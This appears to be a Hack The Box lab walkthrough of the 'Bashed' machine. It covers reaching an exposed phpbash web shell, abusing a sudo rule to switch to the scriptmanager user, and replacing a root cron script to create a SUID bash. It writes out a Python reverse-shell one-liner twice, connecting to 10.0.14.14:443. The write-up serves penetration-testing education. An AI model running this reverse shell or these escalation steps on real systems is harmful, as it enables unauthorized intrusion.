data:image/s3,"s3://crabby-images/28666/2866665a56711a39ae0da5c7071a5760936ee816" alt=""
Hack The Box – Bashed Walkthrough
Introduction
This was an easy Linux machine that involved exploiting a PHP bash shell to gain initial access, misconfigured Sudo rules to escalate to the “scriptmanager” user and a cron job to escalate to root.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
data:image/s3,"s3://crabby-images/30366/3036652780118fcbf4335b039a542c2f303cb786" alt=""
The scan has only identified port 80 (HTTP) as open.
Enumerating HTTP
When accessing the web server through a browser, the following page is displayed:
data:image/s3,"s3://crabby-images/69782/6978213d7583e93d7f7d4f1284fda002a49332ed" alt=""
The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:
- dir to specify the scan should be done against directories and files
- -u to specify the target URL
- -w to specify the word list to use
data:image/s3,"s3://crabby-images/4f8b4/4f8b4a2531d984d0ddd344675e219a30fe7f71de" alt=""
The scan has identified a few interesting entries, one of which being /dev. When visiting it, directory listing is enabled and a few PHP files are displayed:
data:image/s3,"s3://crabby-images/031f6/031f63a8b5336d25ad74d9e47fab3abca97dae73" alt=""
When accessing the “phpbash.php” file, this takes to what looks like a Bash prompt:
data:image/s3,"s3://crabby-images/7aa90/7aa9059ad3fb1ffa9dd89464aed79fed22fda2b0" alt=""
It also seems to function much in the same way as an actual Bash shell:
data:image/s3,"s3://crabby-images/72774/727741fd19413a1a85fcd0419dbc2b84a9ea8865" alt=""
All that is left now is to obtain a shell.
The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
data:image/s3,"s3://crabby-images/fac33/fac33d56216203ed1e46be3e0a52e003c4f0a343" alt=""
A Python reverse shell can then be executed on the PHP Bash prompt:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.14.14",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
data:image/s3,"s3://crabby-images/8f56b/8f56b4f10a17f4dcd51c117ecf7aca25ed1223d9" alt=""
A reverse shell as the www-data user is then returned:
data:image/s3,"s3://crabby-images/8d318/8d31849e2e32836189f741abe81dc8718d01de80" alt=""
Local Enumeration
When executing sudo -l, it appears that the current user can execute all commands as the “scriptmanager” user:
data:image/s3,"s3://crabby-images/6188e/6188eceae77c6b16e6f4f0a479837f1fa8bc51a0" alt=""
Quickly testing this with the id command to ensure remote command execution is possible:
sudo -u scriptmanager id
data:image/s3,"s3://crabby-images/aac1b/aac1bf8d6d585eaf5b8e6aa03f90db3b0803b71c" alt=""
The same Python reverse shell used earlier can then be used again as the scriptmanager user:
sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.14.14",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
data:image/s3,"s3://crabby-images/d2335/d2335d8f0bfb379d9ef1c3f5bb55d83f1a63d167" alt=""
Privilege Escalation
When enumerating for files and folders owned by the scriptmanager user, an unusual “/scripts” folder is present:
find / -xdev -type f -user scriptmanager 2>/dev/null; find -xdev -type d -user scriptmanager 2>/dev/null
data:image/s3,"s3://crabby-images/2ee2c/2ee2cd860d6842a77967866c102e20f911c96e44" alt=""
A “test.py” script can be found, which currently opens the “test.txt” file and writes “testing 123!” to it:
data:image/s3,"s3://crabby-images/f3e5d/f3e5dba7e125f15649ea4cc367fdd5dc901b47fb" alt=""
Since the test.txt file edited by the script is owned by root, this probably means the script itself is being executed as root, probably by a corn job.
Locally creating a Python script that will create a SUID binary of bash:
data:image/s3,"s3://crabby-images/f9134/f913448ab041890a2a04002e7dc5b68e67cd0d4b" alt=""
Transferring it to the target host using the Python Simple HTTP Server and Wget, therefore replacing the original one:
data:image/s3,"s3://crabby-images/2ac4b/2ac4bff0b5582cb1544def1c1193913bb9023618" alt=""
After a minute or so, the cron job has run and has created the “stef” SUID copy of BASH:
data:image/s3,"s3://crabby-images/9f50b/9f50b5ef244fe8116b7629122c29de4312136d3d" alt=""
After executing it with the -p flag, which allows to execute binaries as the owner of it, this grants root access to the host:
data:image/s3,"s3://crabby-images/ca3c2/ca3c2db071bdd1bdfc4d05d5157411cc7762ac56" alt=""
This has now granted root-level access to the target machine.
Conclusion
Although this box is quite trivial it does a great show at showing some of the most common vulnerabilities and misconfiguration, such as administrative consoles and corn jobs.